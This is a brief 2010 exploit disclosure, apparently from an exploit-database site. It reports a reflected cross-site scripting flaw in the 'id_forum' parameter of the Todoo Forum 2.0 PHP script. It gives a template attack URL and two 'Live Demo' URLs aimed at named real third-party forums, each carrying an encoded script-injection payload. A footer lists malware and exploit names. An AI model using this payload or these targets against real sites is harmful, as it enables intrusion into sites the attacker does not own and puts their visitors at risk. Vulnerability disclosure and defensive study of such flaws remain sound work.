Todoo Forum 2.0 Cross Site Scripting Vulnerability

Posted on 09 March 2010

==================================================
Todoo Forum 2.0 Cross Site Scripting Vulnerability
==================================================

[+] ~ Note : [ Tribute to the martyrs of Gaza . ]
==========
[+] Todoo Forum 2.0 [xss] Cross Site Scripting Vulnerability
==========

[+] Script: [ Todoo Forum ]
[+] Language: [ PHP ]
[+] Site page: [ Todooforum est un forum
[+] Download: [
http://www.todoomasters.com/scripts/todooforum.zip ]

##############

===[ Exploit ]===

[+]
http://[target].com/[path]/todooforum.php?cat=post&id_forum=[Xss Vuln]



===[ Live Demo ]===

[+]
http://membres.multimania.fr/ps2foreverall/forum/forum.php?cat=post&id_foru
m=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
[+]
http://aslg.aslpaintball.fr/forum/forum.php?cat=post&id_forum=%22%3E%3Cscri
pt%3Ealert(1);%3C/script%3E


Author: ViRuSMaN <-

##############


# ~  - [ [ : Inj3ct0r : ] ]

TOP

Malware :

None in database

Last 20

ckdoor:Win32/Heloag.A

Exploit:Win32/CVE-2011-3402

Trojan:Win32/Obfac

Exploit:Win32/Pdfjsc.YP

TrojanDownloader:Win32/Bofang.B

Last 20

Exploits :

Last 20